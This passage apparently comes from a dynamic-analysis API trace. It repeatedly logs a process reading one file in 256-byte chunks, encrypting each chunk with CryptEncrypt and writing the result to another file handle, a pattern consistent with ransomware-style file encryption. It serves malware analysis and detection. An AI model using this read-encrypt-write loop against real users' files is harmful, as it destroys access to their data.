lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.028] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.028] GetLastError () returned 0x0 [0164.028] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.028] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.028] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.028] GetLastError () returned 0x0 [0164.028] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.028] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.028] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.028] GetLastError () returned 0x0 [0164.028] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.028] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.029] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.029] GetLastError () returned 0x0 [0164.029] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.029] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.029] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.029] GetLastError () returned 0x0 [0164.029] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.029] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.029] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.029] GetLastError () returned 0x0 [0164.029] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.029] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.029] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.029] GetLastError () returned 0x0 [0164.029] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.029] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.029] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.029] GetLastError () returned 0x0 [0164.029] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.029] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.029] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.029] GetLastError () returned 0x0 [0164.029] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.029] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.029] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.029] GetLastError () returned 0x0 [0164.030] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.030] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.030] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.030] GetLastError () returned 0x0 [0164.030] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.030] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.030] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.030] GetLastError () returned 0x0 [0164.030] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.030] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.030] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.030] GetLastError () returned 0x0 [0164.030] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.030] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.030] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.030] GetLastError () returned 0x0 [0164.030] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.030] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.030] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.030] GetLastError () returned 0x0 [0164.030] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.030] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.030] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.030] GetLastError () returned 0x0 [0164.030] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.031] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.031] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.031] GetLastError () returned 0x0 [0164.031] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.031] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.031] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.031] GetLastError () returned 0x0 [0164.031] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.031] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.031] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.031] GetLastError () returned 0x0 [0164.031] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.031] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.031] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.031] GetLastError () returned 0x0 [0164.031] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.031] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.031] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.031] GetLastError () returned 0x0 [0164.031] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.031] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.031] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.031] GetLastError () returned 0x0 [0164.031] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.031] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.032] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.032] GetLastError () returned 0x0 [0164.032] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.032] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.032] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.032] GetLastError () returned 0x0 [0164.032] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.032] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.032] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.032] GetLastError () returned 0x0 [0164.032] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.032] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.032] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.032] GetLastError () returned 0x0 [0164.032] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.032] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.032] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.032] GetLastError () returned 0x0 [0164.032] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.032] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.032] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.032] GetLastError () returned 0x0 [0164.032] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.032] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.033] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.033] GetLastError () returned 0x0 [0164.033] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.033] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.033] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.033] GetLastError () returned 0x0 [0164.033] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.033] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.033] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.033] GetLastError () returned 0x0 [0164.033] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.033] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.033] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.033] GetLastError () returned 0x0 [0164.033] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.033] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.033] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: 